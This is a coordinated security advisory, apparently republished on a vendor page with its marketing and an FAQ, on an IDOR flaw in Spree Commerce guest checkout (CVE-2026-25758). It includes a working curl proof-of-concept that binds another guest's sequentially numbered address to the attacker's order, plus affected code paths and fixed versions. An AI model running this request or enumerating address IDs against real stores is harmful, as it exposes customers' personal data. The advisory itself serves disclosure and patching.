Summary
A critical IDOR vulnerability exists in Spree Commerce's guest checkout flow that allows any guest user to bind arbitrary guest addresses to their order by manipulating address ID parameters. This enables unauthorized access to other guests' personally identifiable information (PII) including names, addresses and phone numbers. The vulnerability bypasses existing ownership validation checks and affects all guest checkout transactions.
Unauthenticated users can access all guest addresses (GHSL-2026-027)
The vulnerability stems from incomplete authorization validation in Spree's checkout address assignment logic. While nested address attributes (bill_address_attributes[id] and ship_address_attributes[id]) are properly validated through validate_address_ownership, plain ID parameters (bill_address_id and ship_address_id) bypass this check entirely. Since Spree's address IDs are sequential numbers, an attacker might get all guest addresses by simply enumerating over them.
Affected Code Components
Permitted Attributes (
core/lib/spree/permitted_attributes.rb:92–96)- Allows
bill_address_idandship_address_idas permitted parameters without validation
- Allows
Checkout Update (
core/app/models/spree/order/checkout.rb:241–254)- Applies permitted parameters directly to the Order model via
update_from_params
- Applies permitted parameters directly to the Order model via
Incomplete Ownership Validation (
core/app/services/spree/checkout/update.rb:33–48)validate_address_ownershiponly validates nested attributes structure- Does NOT validate plain
bill_address_id/ship_address_idfields
Vulnerable Assignment Logic (
core/app/models/spree/order/address_book.rb:16–23, 31–38)
Both setters check that: address.user_id == order.user_id. For guest orders: nil == nil → TRUE ✓ (bypass!)
Proof of Concept
Precondition: One guest address has to exist in Spree's database. (E.g. Create an order with a guest account and note the ID from the spree_addresses table. E.g. 3)
As a guest user:
- Put one product in the cart and go to checkout.
- Fill in some address/phone number and continue.
- Modify this script containing a curl request with current values.
#!/bin/bash
ATTACKER_ORDER_TOKEN="" # Taken from the URL
VICTIM_ADDRESS_ID="3" # As noted from the database
CSRF_TOKEN="" # From page source; `content` value from meta param `csrf-token`.
SESSION_COOKIE="token=...; _my_store_session=..." # from the browsers cookie store.
curl -i -X POST \
-H "x-csrf-token: ${CSRF_TOKEN}" \
-H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" \
-b "${SESSION_COOKIE}" \
--data-urlencode "_method=patch" \
--data-urlencode "authenticity_token=${CSRF_TOKEN}" \
--data-urlencode "order[ship_address_id]=${VICTIM_ADDRESS_ID}" \
"http://localhost:3000/checkout/${ATTACKER_ORDER_TOKEN}/update/address"
Expected Result: Attacker's order now references victim's address. Through that the attacker has all address details in full display.
This can be verified by accessing /checkout/${ATTACKER_ORDER_TOKEN}/delivery in the same browser where you created the new guest cart.
Impact
This issue may lead to disclosure of PII of guest users (including names, addresses and phone numbers).
CWEs
- CWE-639: Authorization Bypass Through User-Controlled Key
- CWE-284: Improper Access Control
Credit
This issue was discovered with the GitHub Security Lab Taskflow Agent and manually verified by GHSL team members @p- (Peter Stöckli) and @m-y-mo (Man Yue Mo).
Disclosure Policy
This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.
Impact
This issue may lead to disclosure of PII of guest users (including names, addresses and phone numbers).
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
spree_api to 4.10.3 or later; spree_api to 5.0.8 or later; spree_api to 5.1.10 or later; spree_api to 5.2.7 or later; spree_api to 5.3.2 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-25758? CVE-2026-25758 is a high-severity security vulnerability in spree_api (rubygems), affecting versions < 4.10.3. It is fixed in 4.10.3, 5.0.8, 5.1.10, 5.2.7, 5.3.2.
- Which versions of spree_api are affected by CVE-2026-25758? spree_api (rubygems) versions < 4.10.3 is affected.
- Is there a fix for CVE-2026-25758? Yes. CVE-2026-25758 is fixed in 4.10.3, 5.0.8, 5.1.10, 5.2.7, 5.3.2. Upgrade to this version or later.
- Is CVE-2026-25758 exploitable, and should I be worried? Whether CVE-2026-25758 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-25758 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-25758?
- Upgrade
spree_apito 4.10.3 or later - Upgrade
spree_apito 5.0.8 or later - Upgrade
spree_apito 5.1.10 or later - Upgrade
spree_apito 5.2.7 or later - Upgrade
spree_apito 5.3.2 or later
- Upgrade